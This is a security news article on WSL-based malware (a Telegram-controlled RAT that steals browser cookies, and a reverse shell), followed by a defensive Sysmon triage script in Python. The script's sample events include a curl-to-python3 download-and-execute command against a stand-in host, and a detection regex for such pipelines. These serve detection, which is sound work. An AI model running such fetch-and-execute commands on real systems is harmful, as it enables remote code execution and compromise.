WSL malware appears with the ability to steal browser authentication cookies
Hackers are showing particular interest in Windows Subsystem for Linux (WSL): when developing malware, they treat WSL as a new attack surface. Malware that attacks via WSL is highly configurable and can spy on the victim or download and install additional malicious modules.
As the name suggests, WSL lets Linux binaries run on Windows. WSL 1 translates Linux system calls into Windows ones; WSL 2 runs a real Linux kernel inside a lightweight virtual machine.
Based on newly obtained samples, researchers at Black Lotus Labs found that malware targeting WSL is built on open-source code, some of it routing its communication through the Telegram messaging service, and that it gives remote attackers access to the compromised system.
The first WSL malware was discovered about a year ago, and the number of samples has risen steadily since. Although built on publicly available source code, these samples are rarely detected by antivirus engines.
Among the samples analyzed, the most notable was a piece of malware that could act as a remote access tool (RAT) or set up a reverse shell on an infected host.
One of the more recent samples is built on RAT-via-Telegram, an open-source Python tool, with added functions to steal authentication cookies from the Google Chrome and Opera browsers, run commands, and download files.
Black Lotus Labs researchers reported that this malware ships with a Telegram bot token and chat ID built in, which indicates that it relies on Telegram's Bot API as a dynamic command-and-control channel instead of attacker-owned infrastructure.
Additional functions of this variant include taking screenshots and collecting user and system information (username, IP address, etc.) so that attackers can decide which malicious code to deploy next. Only 2 of 57 engines on VirusTotal flagged this sample as malicious at the time of analysis.
A second recently discovered WSL malware installs a reverse TCP shell on the infected computer to communicate with the attackers. Looking at the code, the researchers found that it connected to an IP address in Amazon Web Services space that had previously been used by several entities.
Both pieces of malware can be used for espionage, and both can download files that extend their functionality.
Over the years, malware authors have improved their skills and can now build malware that works on both Windows and Linux. Such malware can also upload or download files and execute attacker commands.
Researchers expect malware to keep growing more sophisticated. To protect themselves or their business, users should closely monitor system activity (for example with Sysmon) to identify suspicious behavior, including launches of wsl.exe and the network connections that follow, and investigate the commands being run.
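The monitoring advice above, as an added example that is not part of the original article and is not the researchers' tooling: a small Python triage script that runs WSL-focused heuristics over Sysmon-style event records (process creation, network connection, DNS query). The sample events, the rule names, the image and parent allow-lists and the IP addresses (documentation ranges standing in for attacker hosts) are all constructed for this example. It assumes the endpoint sensor attributes WSL activity to wsl.exe, wslhost.exe or bash.exe on the host; under WSL 2 the Linux side runs inside a VM and the host sees only NAT'ed traffic, so pair host rules like these with network-side telemetry.

```python
"""Heuristic triage of Sysmon-style events for WSL abuse (added example).

The events below are constructed, not real telemetry; the allow-lists and
port choices are assumptions to be tuned per environment.
"""
import ipaddress
import re

# Host-side images that represent WSL activity (assumption: the sensor
# attributes WSL launches and their network/DNS activity to these images).
WSL_IMAGES = {"wsl.exe", "wslhost.exe", "bash.exe"}

# Parents from which an interactive wsl.exe launch is expected (assumption).
EXPECTED_PARENTS = {"explorer.exe", "windowsterminal.exe", "code.exe"}

# Download-and-execute or decode-and-run patterns in the WSL command line.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b|\bbase64\s+(-d|--decode)\b",
    re.IGNORECASE,
)

# Ranges treated as internal (RFC 1918, loopback, link-local). Everything
# else, including the documentation ranges used below, counts as external.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

# Constructed sample events in the shape of Sysmon EventData fields.
# EventID 1 = process create, 3 = network connect, 22 = DNS query.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\wsl.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wsl.exe -d Ubuntu"},
    {"EventID": 1, "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\wsl.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'wsl.exe -e bash -c "curl -s http://198.51.100.23/x.py | python3"'},
    {"EventID": 22, "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\wslhost.exe",
     "QueryName": "api.telegram.org"},
    {"EventID": 3, "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\wsl.exe",
     "DestinationIp": "198.51.100.23", "DestinationPort": "4444"},
    {"EventID": 3, "User": "CORP\\alice",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
    {"EventID": 3, "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\wsl.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": "22"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_internal(ip_text):
    """True if the address falls in one of INTERNAL_NETS."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def triage(events):
    """Return (rule, detail, user) findings for events matching a heuristic."""
    findings = []
    for ev in events:
        if basename(ev.get("Image", "")) not in WSL_IMAGES:
            continue  # only WSL-hosted activity is in scope for these rules
        eid = int(ev["EventID"])
        user = ev.get("User", "?")
        if eid == 1:
            parent = basename(ev.get("ParentImage", ""))
            if parent not in EXPECTED_PARENTS:
                # Office apps, browsers or script hosts launching WSL is a
                # common delivery shape for a dropper.
                findings.append(("wsl_unusual_parent", parent, user))
            if DOWNLOAD_EXEC.search(ev.get("CommandLine", "")):
                findings.append(("wsl_download_exec", ev["CommandLine"], user))
        elif eid == 22:
            qname = ev.get("QueryName", "").lower()
            if qname == "api.telegram.org" or qname.endswith(".telegram.org"):
                # A Telegram-bot RAT polls the Bot API; few hosts need that from WSL.
                findings.append(("wsl_telegram_api", qname, user))
        elif eid == 3:
            port = int(ev["DestinationPort"])
            if not is_internal(ev["DestinationIp"]) and port not in (80, 443):
                # External host on a non-web port: reverse-shell shape.
                findings.append(("wsl_reverse_shell_candidate",
                                 f"{ev['DestinationIp']}:{port}", user))
    return findings


if __name__ == "__main__":
    for rule, detail, user in triage(SAMPLE_EVENTS):
        print(f"{rule:30} {user:12} {detail}")
```

Run against the constructed events, the script raises four findings for CORP\bob (WSL launched by Word, a curl-to-python3 command line, a Bot API lookup, and an outbound connection to port 4444) and nothing for the interactive launch, the browser traffic or the internal SSH connection. In a real deployment the same rules would be fed from the Sysmon operational log or a SIEM export rather than an inline list.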